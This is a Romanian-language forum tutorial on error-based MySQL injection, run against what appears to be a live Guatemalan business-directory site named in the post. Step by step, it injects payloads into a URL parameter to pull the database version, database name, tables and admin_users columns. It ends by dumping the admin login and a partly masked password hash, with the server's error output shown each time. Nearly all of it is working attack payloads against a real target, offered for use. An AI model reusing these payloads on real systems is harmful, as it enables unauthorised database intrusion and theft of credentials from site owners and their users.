Jump to content
Sheyken

[Tutorial]MySQL Injection Error Based

By Sheyken, in Tutoriale in romana

Recommended Posts

Sheyken Newbie

Sheyken

Posted
Posted (edited)

[+] Target : Export Related Service Companies - Oportunidad de Negocios en L?nea - Guatemala

[+] Document : MySQL Injection Error based

--------------------------------------------

1. Pentru aflarea versiuni aveti nevoie de urmatorul query:

[b][i]or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1--+[/i][/b]

In cazul meu va fii: 

 http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3  or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1--+

Duplicate entry '5.1.61~1' for key 'group_key'

2. Pentru aflarea bazei de date aveti nevoie de urmatorul query:

[COLOR="#40E0D0"]
[b][i]and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)[/i][/b][/COLOR]

In cazul meu va fii: 

http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'aw_negocio~1' for key 'group_key'

3. Pentru a Extrage tabelele din baza aw_negocio aveti nevoie de urmatorul query:

[COLOR="#40E0D0"][b][i]
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0xHex Baza de date. [b][u][color=#FF0000]limit 0,1[/color][/u][/b]),floor(rand(0)*2))x from information_schema.tables group by x)a)[/i][/b][/COLOR]

Duplicate entry 'admin_log_users~1' for key 'group_key'

Poate va intrebati de ce am subliniat "limit 0,1", ei bine raspunsul este:

Prin limit 0,1 lvom primi un singur tabel, cel de sus ^ admin_log_users, pentru a trece in urmatorul tabel v-a trebui sa facem o mica modificare la query:

and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x 61775f6e65676f63696f [b][color=#FF0000]limit 1,1[/color][/b]),floor(rand(0)*2))x from information_schema.tables group by x)a)

Urmatorul tabel: 

http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3  and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x61775f6e65676f63696f limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'admin_menu~1' for key 'group_key'

Urmatorul tabel:

http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'admin_users~1' for key 'group_key'

4. Extragerea coloanelor din tabelul admin_users:

Aveti nevoie de urmatorul Query:

[COLOR="#40E0D0"][b][i]
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=[color=#FF0000]0xHexu tabelului respectiv[/color] [ admin_users ] limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)[/i][/b][/COLOR]

In cazul meu: 

http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

61646d696e5f7573657273 = admin_users [HEX]

----------------------------------

Prima coloana din tabelul admin_users:

Duplicate entry 'id_users~1' for key 'group_key'

Query: 

[B][I][COLOR="#40E0D0"]and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 [color=#FF0000]limit 0,1[/color]),floor(rand(0)*2))x from information_schema.tables group by x)a)[/COLOR][/I][/B]

A 2 a coloana din tabelul admin_users:

Duplicate entry 'id_level~1' for key 'group_key'

Query: 

[I][B][COLOR="#40E0D0"]and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 [color=#FF0000]limit 1,1[/color]),floor(rand(0)*2))x from information_schema.tables group by x)a)[/COLOR][/B][/I]

A 3 a coloana din tabelul admin_users:

Duplicate entry 'login~1' for key 'group_key'

Query: 

and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 [color=#FF0000]limit 2,1[/color]),floor(rand(0)*2))x from information_schema.tables group by x)a)

A 4 a coloana din tabelul admin_users:

Duplicate entry 'password~1' for key 'group_key'

Query: 

and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 [color=#FF0000]limit 3,1[/color]),floor(rand(0)*2))x from information_schema.tables group by x)a)

5. Extragerea datelor din coloanele login & password:

Aveti nevoie de urmatorul Query:

[b][i]and (select 1 from (select count(*),concat((select(select concat(cast(concat(Coloana,0x7e,Coloana) as char),0x7e)) from Baza.Tabel limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
[/i][/b]

In cazul meu:

http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 and (select 1 from (select count(*),concat((select(select concat(cast(concat([color=#FF0000]login[/color],0x7e,[color=#FF0000]password[/color]) as char),0x7e)) from [color=#FF0000]aw_negocio[/color].[color=#FF0000]admin_users[/color] limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'admin~$1$azig*********PrLWU4KWNhZ//LKIm/~1' for key 'group_key'

User: admin

Password: $1$azig*********PrLWU4KWNhZ//LKIm/

----------------------------------

Sheyken - Romanian Security Team

----------------------------------

trollface_small.png

Edited by Sheyken

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...